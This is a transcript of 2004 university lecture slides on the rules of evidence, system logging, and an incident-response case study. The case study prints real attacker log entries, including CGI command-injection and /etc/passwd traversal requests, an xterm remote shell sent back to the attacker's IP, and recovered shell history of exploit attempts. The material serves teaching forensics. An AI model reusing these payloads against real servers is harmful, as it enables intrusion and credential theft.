1 / 72

CSCI E-170: November 30, 2004 Administrivia Federal Rules of Evidence Logging Integrity Management

CSCI E-170: November 30, 2004 Administrivia Federal Rules of Evidence Logging Integrity Management. Administrivia. Project Proposals are due today Who is in your group? What are you doing? Not graded Quiz #2: You will be given 4 papers and expected to write a page on each. Administrivia 2.

barr
Download Presentation

CSCI E-170: November 30, 2004 Administrivia Federal Rules of Evidence Logging Integrity Management

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript

  1. CSCI E-170: November 30, 2004AdministriviaFederal Rules of EvidenceLoggingIntegrity Management

  2. Administrivia • Project Proposals are due today • Who is in your group? • What are you doing? • Not graded • Quiz #2: You will be given 4 papers and expected to write a page on each.

  3. Administrivia 2 • Some students have not turned in any work to date…. • Think about dropping the course. • Students who do not turn in a final project will fail.

  4. Federal Rules of Evidence • 9 Articles • Many states follow FRE • Codifies common law • Why study them?

  5. Article I: Ground Rules • Rule 101 - Scope • Rule 1101 - Does not apply to preliminary questions of fact, grand jury, miscellaneous proceedings • Rule 102 - Purpose: • Fairness • Eliminate unjustifiable expense and delay • Rule 103 - Rulings on Evidence • What to do when opposing parties disagree.

  6. Article II: JUDICIAL NOTICE • Every case involves the use of hundres or thousands of non-evidence facts • When a witness says “car,” eveyone assumes that the “car” is an automobile, not a railroad car, that it is self-propelled, and so on.

  7. ARTICLE III: PRESUMPTIONS IN CIVIL ACTIONS AND PROCEEDINGS • Determines who has the burden of rebutting the evidence. • Presumption imposes on the party against whom it is directed the burden of going forward with evidence to rebut or meet the presumption

  8. ARTICLE IV: RELEVANCY AND ITS LIMITS • Relevant evidence is admissible • Irrelevant Evidence is inadmissible • Evidence that wastes time can be excluded • Character evidence of defendant not admissible to prove conduct (unless introduced by defendant) • Character evidence of victim introduced only in homicide case to rebut evidence that alleged victim was first aggressor • Rule 412 - “rape shield” law

  9. ARTICLE V: PRIVILEGES • “…may be interpreted by the courts of the United States in light of reason and experience”

  10. ARTICLE VI: WITNESSES • Rule 601: Every person is competent to be a witness (except as otherwise provided) • Rule 602: Witness must have personal knowledge • Rule 605: Judge cannot testify as witness • Rule 606: Juror may not testify as witness • Rule 612: Adverse party is entitled access to “writing used to refresh memory”

  11. ARTICLE VII: OPINIONS AND EXPERT TESTIMONY • Rule 701: Law Witness may not testify based on “scientific, technical, or other specialized knowledge” • Rule 702: Experts must be qualified; use reliable principles and methods; witness must apply standards to this case. • Rule 704: Experts may state an opinion of the “ultimate issue,” except for matters of mental state.

  12. ARTICLE VIII: HEARSAY • Rule 801: “Hearsay” is a statement, other than one made by the declarant while testifying at the trial or hearing, offered in evidence to prove the truth of the matter asserted. • Many, many exceptions to hearsay… • 803(5) - Recorded Recollection • 803(6) - Records of regularly conducted activity • 803(7) Absence of entry in records kept in accordance with 803(6) “to prove nonoccurance or nonexistence”

  13. ARTICLE IX: AUTHENTICATION AND IDENTIFICATION • Rule 901: Documents must be authenticated; many examples given • Rule 902: Some documents are self-authenticating; (computer records aren’t)

  14. ARTICLE X: CONTENTS OF WRITINGS, RECORDINGS, AND PHOTOGRAPHS • Rule 1002: Originals are required, except where duplicates may be admitted. • Rule 1003: Duplicates may be admitted unless genuine questions are raised about the authenticity or in “unfair” circumstances. • What is an original computer record?

  15. ARTICLE XI: MISCELLANEOUS RULES • Rule 1101: Applicability • Rule 1102: Amendments • Rule 1103: Title

  16. Orin S. Kerr article • What’s the point? • What are “Records of regularly conducted activity?” • Are computer records “monolithic?” • How do you Authenticate computer records? How are they challenged? • When do the Hearsay rules apply? • What’s the deal with postings from websites of white supremacist groups? • What about email in a harassment case?

  17. What is a log? • Definition? • Unix vs. Windows? • Palm?

  18. What gets logged?

  19. What gets logged? • Logins / logouts • Privilege escalation • Security relevant events

  20. What goes in a log?

  21. Why keep logs?

  22. Why look at logs? (Marcus) • Policy • Legality • Cost saving

  23. Common mistakes (Marcus) • #1 – collecting it and not looking at it (might as well log to /dev/null) • #2 – watching logs from perimeter systems while ignoring internal systems • #3 – Designing your log architecture before you decide what you’re going to collect • #4 – Only looking for what you know you want to find instead of just looking to see what you find.

  24. Common Mistakes 2: • #5 – Proceeding without doing envelope estimates with of load. • #6 – thinking your logs are evidence if you don’t collect them right • #7 – forgetting that this is just a data management problem • #8 – Drinking the XML Kool-ade

  25. How are things logged? • f = fopen(“logfile”,”w+”) • syslog() • Logger

  26. Web Logs • access_log vs. error_log • 65.54.188.137 - - [30/Nov/2004:00:16:54 -0500] "GET /photos/security/printTifs/medRes/onGray/platePlusStickerGreyMR.tif HTTP/1.0" 200 6017064 "-" "msnbot/0.3 (+http://search.msn.com/msnbot.htm)" • 66.35.208.62 - - [30/Nov/2004:00:17:38 -0500] "GET /blog/index.rdf HTTP/1.1" 200 8882 "-" "Jakarta Commons-HttpClient/2.0.1"

  27. Web logs…grep 'q=' ~www/simson.net/logs/access_log | sed 's/^.*q=//' | awk '{print $1;}' | head • smart+identity+card&client=disney-go&start=10" • simson&hl=de&lr=&ie=UTF-8&oe=UTF-8&start=20&sa=N" • backing+up+raid+drives&hl=en&lr=&ie=UTF-8&oe=UTF-8&start=10&sa=N" • lzhuf&hl=en&lr=&ie=UTF-8&start=40&sa=N" • brown+simson&FORM=SMCRT" • %22home+wiring%22&_sb_lang=en" • %22wireless+photo+album%22&lr=" • lzhuf+public+domain&hl=en&lr=&ie=UTF-8&start=10&sa=N" • simson&ie=ISO-8859-1&hl=en&btnG=Google+Search&meta=" • simson&ie=ISO-8859-1&hl=en&btnG=Google+Search&meta="

  28. Mail Logs • 2004-11-13 23:51:35 H=ns.simson.net (64.7.15.234) [64.7.15.234] F=<ruxnezze@swissonline.ch> rejected RCPT <domideltana@ex.com>: Unknown user • 2004-11-13 23:51:36 H=ns.simson.net (64.7.15.234) [64.7.15.234] F=<ruxnezze@swissonline.ch> rejected RCPT <domidrumsaloe@ex.com>: Unknown user • 2004-11-13 23:51:36 H=ns.simson.net (64.7.15.234) [64.7.15.234] F=<ruxnezze@swissonline.ch> rejected RCPT <domie.douglass@ex.com>: Unknown user • 2004-11-13 23:51:37 H=ns.simson.net (64.7.15.234) [64.7.15.234] F=<ruxnezze@swissonline.ch> rejected RCPT <domielihli@ex.com>: Unknown user • 2004-11-13 23:51:37 H=ns.simson.net (64.7.15.234) [64.7.15.234] F=<ruxnezze@swissonline.ch> rejected RCPT <domierdoc14@ex.com>: Unknown user • 2004-11-13 23:51:38 H=ns.simson.net (64.7.15.234) [64.7.15.234] F=<ruxnezze@swissonline.ch> rejected RCPT <domifdwyer@ex.com>: Unknown user • 2004-11-13 23:51:38 H=ns.simson.net (64.7.15.234) [64.7.15.234] F=<ruxnezze@swissonline.ch> rejected RCPT <domil.cpwhiz40@ex.com>: Unknown user • 2004-11-13 23:52:01 H=ns.simson.net (cable-67-97-53-251.dct.al.charter.com) [64.7.15.234] F=<mvceubrfvsrm@charter.com> rejected RCPT <gayda@ex.com>: Unknow • n user • 2004-11-13 23:52:01 H=ns.simson.net (cable-67-97-53-251.dct.al.charter.com) [64.7.15.234] F=<mvceubrfvsrm@charter.com> rejected RCPT <jensen@ex.com>: Unkno • wn user

  29. Radius Logs • Sun Mar 18 04:35:24 2001 Acct-Session-Id = "00000000” NAS-IP-Address = 192.168.1.5 Acct-Status-Type = Stop Acct-Session-Time = 0 Acct-Delay-Time = 0 Timestamp = 984918924 Request-Authenticator = VerifiedSun Mar 18 04:35:24 2001 Acct-Session-Id = "06000004” User-Name = "admin” NAS-IP-Address = 192.168.1.5 Acct-Status-Type = Start Acct-Authentic = Local Service-Type = Administrative-User Login-Service = Telnet Login-IP-Host = 192.168.1.1 Acct-Delay-Time = 75 Timestamp = 984918924 Request-Authenticator = Verified

  30. Security Incidents: Strange Authentication Attempts • I woke up to find these entries in my RADIUS log file: Tue Mar 30 10:26:00 2004: Auth: Login incorrect: [config/system] (from nas xxxx/S99) Tue Mar 30 10:26:00 2004: Auth: Login incorrect: [config/password admin] (from nas xxxx/S99) Tue Mar 30 10:26:00 2004: Auth: Login incorrect: [config/13370n3z] (from nas xxxx/S99) Tue Mar 30 10:26:01 2004: Auth: Login incorrect: [password/fawkoffsz] (from nas xxxx/S99) Tue Mar 30 10:26:01 2004: Auth: Login incorrect: [password/save] (from nas xxxx/S99) http://seclists.org/lists/incidents/2004/Mar/0116.html

  31. Log architectures • UDP log issues • Windows

  32. Logging on Unix • /etc/syslog.conf • /etc/newsyslog.conf • Grep • swatch

  33. Logging on Windows: • Event Viewer • Local security settings

  34. Log hosts & Aggregation

  35. Can you trust these logs?

  36. October 7th, 1997 • 6:00pm • Arrive hotel in New York City. • Phone system does not support my modem. • Cell phone reception is terrible. • 8:45pm • Phone call from Eric Bates. • “I think that we have a visitor.”

  37. Wed October 7th, 1997 • User http is logged in on ttyp0 and idle for one day: bash-2.02# w 8:57PM up 27 days, 14:19, 5 users, load averages: 0.28, 0.33, 0.35 USER TTY FROM LOGIN@ IDLE WHAT http p0 KRLDB110-06.spli Tue02AM 1days /bin/sh simsong p1 asy12.vineyard.n 8:42PM 15 -tcsh (tcsh) ericx p2 mac-ewb.vineyard 8:46PM 0 script ericx p3 mac-ewb.vineyard 8:46PM 11 top ericx p4 mac-ewb.vineyard 8:53PM 1 sleep 5 bash-2.02# • (Other employees had seen this and ignored it!)

  38. First step: Document the machine • script(1) to create a transcript • ps process list • netstat -a open network connections • (lsof) open files • grep ‘krldb’ access_log likely avenue of attack • Goals: • Don’t alarm intruder. • Find mechanism of access • Find out what he/she did. • Plug the holes.

  39. ps - processes • Attacker only had two processes • /bin/sh on /dev/ttyp0 (2 copies) • PID 18671 and 26225 • Idle since 2AM the previous day. walden: {336} % grep p0 plist http 18671 0.0 0.1 244 276 p0 Is Tue02AM 0:02.23 /bin/sh http 26225 0.0 0.1 236 276 p0 I+ Tue04AM 0:00.07 /bin/sh walden: {337} %

  40. netstat - network connections • “w” gave incomplete hostname: • KRLDB110-06.spli • netstat revealed one connection -- x11! bash-2.02# netstat -a Active Internet connections (including servers) Proto Recv-Q Send-Q Local Address Foreign Address (state) . . . tcp 0 0 APACHE.VINEYARD..3098 KRLDB110-06.spli.X11 ESTABLISHED • Use netstat –n to get IP address, from which you can get the full DNS name.

  41. access_log - showed attack Grep krldb /usr/local/apache/logs/access_log krldb110-06.splitrock.net - - [06/Oct/1998:02:53:48 -0400] "GET /cgi-bin/phf?Qname=me%0als%20-lFa HTTP/1.0" 404 - "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows 98)" "/htdocs/biz/captiva“ krldb110-06.splitrock.net - - [06/Oct/1998:02:53:50 -0400] "GET /cgi-bin/faxsurvey?ls%20-lFa HTTP/1.0" 200 5469 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows 98)" "/htdocs/biz/captiva“ krldb110-06.splitrock.net - - [06/Oct/1998:02:53:52 -0400] "GET /cgi-bin/view-source?../../../../../../../../etc/passwd HTTP/1.0" 404 - "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows 98)" "/htdocs/biz/captiva"

  42. Attacker GETs GET /cgi-bin/phf?Qname=me%0als%20-lFa GET /cgi-bin/faxsurvey?ls%20-lFa GET /cgi-bin/view-source?../../../../../../../../etc/passwd GET /cgi-bin/htmlscript?../../../../../../../../etc/passwd GET /cgi-bin/campas?%0als%20-lFa GET /cgi-bin/handler/useless_shit;ls%20-lFa|?data=Download GET /cgi-bin/php.cgi?/etc/passwd GET /cgi-bin/faxsurvey?ls%20-lFa GET /cgi-bin/faxsurvey?uname%20-a GET /cgi-bin/faxsurvey?id GET /cgi-bin/faxsurvey?cat%20/etc/passwd GET /cgi-bin/faxsurvey?ls%20-lFa%20/usr/ GET /cgi-bin/faxsurvey?id GET /cgi-bin/faxsurvey?pwd GET /cgi-bin/faxsurvey?/bin/pwd GET /cgi-bin/faxsurvey?ls%20-lFa GET /cgi-bin/faxsurvey?ls%20-lFa%20../conf/

  43. Facts so far • It looks like the faxsurvey program allowed attacker to run arbitrary programs. • No evidence that he ran xterm --- except for the X11 connection back to his machine. • We don’t know what he did or what else he knows.

  44. Action plan • Add filter to router to block all access from splitrock (his ISP). • STOP his processes and gcore them to get command history. • kill -STOP PIDs • gcore -c file pid • strings file • Rename/remove the faxsurvey program (part of hylafax system).

  45. Selected Environment variablesfrom /bin/sh #1: GATEWAY_INTERFACE=CGI/1.1 REMOTE_HOST=krldb110-06.splitrock.net REMOTE_ADDR=209.156.113.121 DOCUMENT_ROOT=/htdocs/biz/captiva REMOTE_PORT=4801 SCRIPT_FILENAME=/vni/cgi-bin/faxsurvey LOGNAME=http REQUEST_URI=/cgi-bin/faxsurvey?/usr/X11R6/bin/xterm%20-display%20209.156.113.121:0.0%20-rv%20-e%20/bin/sh DISPLAY=209.156.113.121:0.0 SERVER_PORT=80 SCRIPT_NAME=/cgi-bin/faxsurvey

  46. History from /bin/sh #1: st2.c cron.c cxterm.c x2.c qpush.c cat t.c cat .c cat s.c gc c ls -lFa ./s -v c2 ./s p0 ls -lFa / cat .s ls -lFa cat /w ls -lFa / cat .s _=.s $ : not found gcc -o s steal.c ls -lFa *.c gcc -o s s.c ftp 209.156.113.121 gcc -o s st2.c ./s console t .s .121 qpush.c ppp.c t2.c cron.c cxterm.c tcsh x2.c README README.debian qpush qpush.c qpush.c.old gf: not found /tmp mfs:28 /bin/sh …Looks like the attacker was trying to get some sort of root-stealing exploit for Linux (or Debian Linux) to work on the machine.

  47. Selected history from /bin/sh #2: /bin/sh /bin/sh /etc/inetd.conf qpush.c /usr/bin/gcc n/gcc ./cc expr done /bin/sh inetd.conf t) | telnet 127.1 143 cd /etc cat .s which pwd ls -lFa expr $L + 1 ls -lFa ./cc -10 ./cc Attacker sees that we are running imap

  48. Selected history from /bin/sh #2: ./cc /tmp/.s /tmp cd /tmp cd .s L=100 cd .s L=-100 ls -lFa cd /tmp /bin/sh ./q 127.1 load /bins _=127.1 _=/bins ./cc ./cc -92 ./cc -100 ./cc 100 cat .s ./cx Attempts to exploit imap vulnerability

  49. Selected history from /bin/sh #2: cat .s export L _=.s cat /etc/passwd |grep "root" DISPLAY=209.156.113.121:0.0 -rvgdsg DISPLAY=209.156.113.121:0.0 cat /etc/passwd |Grep "http" cat /etc/passwd |grep "http" cat /etc/passwd |grep "www" while [ $: done 2 $L echo $L (./i 403 0xefbfd5e8 100; cat) |nc 127.1 143 cx $L $L +1` (./i 403 0xefbfd5e8 100; cat) | telnet 127.1 143 echo ./cc $L L=`expr $L + 1` Searching for accounts and passwords… Tries again for imap

  50. Selected history from /bin/sh #2: uname ftp 209.156.113.121 mv pp.c p.c ls -lFa mas* ls -lFa /etc |grep "mas" cat master.passwd telnet 127.1 25 locate modstat which modstat ls -lFa /usr/bin/mo* locate modstate locate ico s.c locate modload grep ftp wildsau.idv.uni-lki i-lki cat /etc/inetd.conf ./q -0 127.1 cat /etc/inetd.coinf ftp 209.156.113.121 gcc -o cc cron.c ftp 209.156.113.121 gcc -o cx cxterm.c Tries for shadow passwordfile Tries again for sendmail Tries for linux kernel module loader And so on…

More Related